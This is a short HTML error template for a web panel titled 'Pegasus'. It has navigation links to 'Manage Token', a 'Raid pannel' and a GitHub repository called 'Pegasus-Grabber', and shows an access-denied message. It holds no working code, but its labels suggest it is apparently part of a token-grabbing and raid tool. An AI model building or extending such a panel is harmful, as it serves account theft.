<!DOCTYPE html>
<html>
<header>
    <meta charset="utf-8">
    <title>Pegasus - error</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='css/style.css') }}">
</header>

<body>
    <div class="navbar">
        <ul>
            <li><a href="/">Main Page</a></li>
            <li><a href="token">Manage Token</a></li>
            <li><a href="404.html">Raid pannel</a></li>
            <li><a href="https://github.com/Its-Vichy/Pegasus-Grabber" target="_blank">Github</a></li>
        </ul>
    </div>

    <p class='title_page'>You can't access to that bro.</p>
</body>

</html>